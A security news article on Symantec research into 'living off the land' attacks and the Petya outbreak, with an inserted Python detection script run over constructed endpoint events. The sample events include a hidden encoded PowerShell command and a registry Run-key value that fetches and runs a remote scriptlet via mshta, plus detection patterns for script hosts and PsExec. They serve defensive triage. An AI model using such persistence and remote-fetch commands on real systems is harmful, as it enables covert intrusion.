Hackers are Increasingly ‘Living off the Land,’ Symantec Research Finds


Attackers are more and more often relying on tools and processes already present on target computers, a technique called “living off the land,” to simplify intrusions and reduce the chance of detection, according to a recent Symantec study.

“Attackers are increasingly making use of tools already installed on targeted computers or are running simple scripts and shellcode directly in memory,” wrote Candid Wueest, threat researcher at Symantec. “Creating fewer new files on the hard disk, or being completely fileless, means less chance of being detected by traditional security tools and therefore minimizes the risk of an attack being blocked. Using simple and clean dual-use tools allows the attacker to hide in plain sight among legitimate system administration work.”

According to the report, there are four primary types of “living off the land” attack:

  • Dual-use tools, such as PsExec, that are legitimately installed but repurposed by the attacker.
  • Memory-only threats, such as the Code Red worm, which never write a payload to disk.
  • Fileless persistence, such as a VBS script stored in the registry and launched at startup.
  • Non-PE file attacks, such as Office documents carrying macros or scripts.
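As an added illustration of what detecting these four categories looks like in practice (this is example code, not the Symantec report's or the article's own), the Python triage below runs a handful of heuristic rules over constructed, Sysmon-style endpoint events. The events, field names, and rule thresholds are assumptions for the example; none of it is captured telemetry.

```python
"""Living-off-the-land triage over constructed endpoint events (added example).

The events below are constructed, Sysmon-style records, not captured
telemetry; field names follow Sysmon Event ID 1 (process creation), Event ID
13 (registry value set) and the System log's 7045 (service installed).
The detection rules are assumptions chosen to illustrate the four categories.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# --- constructed sample input ------------------------------------------------
SAMPLE_EVENTS = [
    # memory-only: encoded PowerShell that will run a payload without a file
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    # non-PE file attack: Word macro spawning the Windows Script Host
    {"id": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"wscript.exe C:\Users\u\AppData\Local\Temp\invoice.vbs"},
    # fileless persistence: a Run-key value that is itself the VBS payload
    {"id": 13,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": 'mshta vbscript:Execute("GetObject(""script:http://192.0.2.10/p.sct"")")'},
    # dual-use tool: PsExec's service being installed on a target host
    {"id": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    # benign activity that must not fire
    {"id": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe readme.txt"},
]

# --- heuristic rules (assumed for the example) -------------------------------
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "cmd.exe"}
PSEXEC_IMAGES = {"psexec.exe", "psexec64.exe"}
SCRIPT_MARKERS = ("wscript", "cscript", "mshta", "vbscript:", "powershell")
# Run / RunOnce keys under any hive
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
# -EncodedCommand and its accepted abbreviations followed by a base64 blob
ENC_PS_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I)


@dataclass(frozen=True)
class Finding:
    category: str   # one of the report's four categories
    rule: str       # which heuristic fired
    index: int      # position of the event in the input list


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict, index: int) -> list[Finding]:
    """Return every finding the rules produce for a single event."""
    out: list[Finding] = []
    eid = event.get("id")
    if eid == 7045:
        svc = (event.get("ServiceName", "") + event.get("ImagePath", "")).lower()
        if "psexesvc" in svc:
            out.append(Finding("dual-use tool", "psexec_service_install", index))
    elif eid == 13:
        details = event.get("Details", "").lower()
        if RUN_KEY_RE.search(event.get("TargetObject", "")) and any(m in details for m in SCRIPT_MARKERS):
            out.append(Finding("fileless persistence", "script_in_run_key", index))
    elif eid == 1:
        image = _basename(event.get("Image", ""))
        parent = _basename(event.get("ParentImage", ""))
        cmd = event.get("CommandLine", "")
        if image in PSEXEC_IMAGES:
            out.append(Finding("dual-use tool", "psexec_launch", index))
        if image == "powershell.exe" and ENC_PS_RE.search(cmd):
            out.append(Finding("memory-only", "encoded_powershell", index))
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            out.append(Finding("non-PE file", "office_spawns_script_host", index))
    return out


def triage(events: list[dict]) -> list[Finding]:
    """Run classify() over a stream of events and collect the findings."""
    findings: list[Finding] = []
    for i, ev in enumerate(events):
        findings.extend(classify(ev, i))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.index}: {f.category:<20} ({f.rule})")
```

The caveat a practitioner would add is that every one of these rules also fires on legitimate administration: PsExec service installs and encoded PowerShell are routine in many environments, which is exactly the "hide in plain sight" problem the report describes. Rules like these are useful as a triage layer only when paired with a baseline of who normally runs these tools from where; the Office-spawns-script-host rule is the one with the lowest benign hit rate.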

According to the report, the Petya ransomware outbreak in June 2017 is a good example of a “living off the land” attack: beyond the exploit it carried, it spread laterally with the built-in WMIC utility and the Sysinternals PsExec tool, using credentials harvested from the infected host.

“The ransomware exhibited some wiper characteristics and immediately gained the attention of both security experts and the media as it was, among other propagation methods, exploiting the SMB EternalBlue vulnerability just like the headline grabbing WannaCry (Ransom.WannaCry) did one month earlier,” Wueest wrote. “The threat made use of a clever supply chain attack as its initial infection vector by compromising the update process of a widely used accounting software program.”

The report says the best mitigations for such low-detectability attacks are well-known practices: network segmentation, extensive logging (so that dual-use tool activity can be audited and compared against a baseline), and a least-privilege approach that limits what a compromised account or tool can reach. In addition, organizations should focus on blocking the most common infection points, email and compromised websites.
